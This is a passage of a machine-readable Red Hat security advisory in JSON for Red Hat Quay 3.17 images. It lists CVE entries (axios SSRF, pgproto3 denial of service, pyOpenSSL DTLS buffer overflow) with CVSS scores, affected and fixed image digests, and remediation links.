            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization"
    },
    {
      "cve": "CVE-2026-4427",
      "discovery_date": "2026-03-18T14:02:19.414820+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "No description is available for this CVE.",
          "title": "Vulnerability description"
        },
        {
          "category": "other",
          "text": "This CVE has been marked as Rejected by the assigning CNA.",
          "title": "Statement"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4427"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4427",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4427"
        }
      ],
      "release_date": "2026-03-18T13:00:31+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "title": "github.com/jackc/pgproto3: pgproto3: Denial of Service via negative field length in DataRow message"
    },
    {
      "cve": "CVE-2026-27459",
      "cwe": {
        "id": "CWE-120",
        "name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
      },
      "discovery_date": "2026-03-18T00:01:41.404915+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2448503"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in pyOpenSSL. The set_cookie_generate_callback callback function can be used to generate DTLS cookies. When the callback returns a cookie string or byte sequence longer than 256 bytes, a buffer overflow can be triggered due to a missing bounds checking before copying the data to a fixed-size buffer provided by the underlying OpenSSL library.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "pyOpenSSL: DTLS cookie callback buffer overflow",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw is only exploitable when an application using the pyOpenSSL library provides a custom callback to the set_cookie_generate_callback function. For the buffer overflow to occur, the callback function must return a cookie string or byte sequence longer than 256 bytes, limiting the exposure of this issue. Due to these reasons, this vulnerability has been rated with an important severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
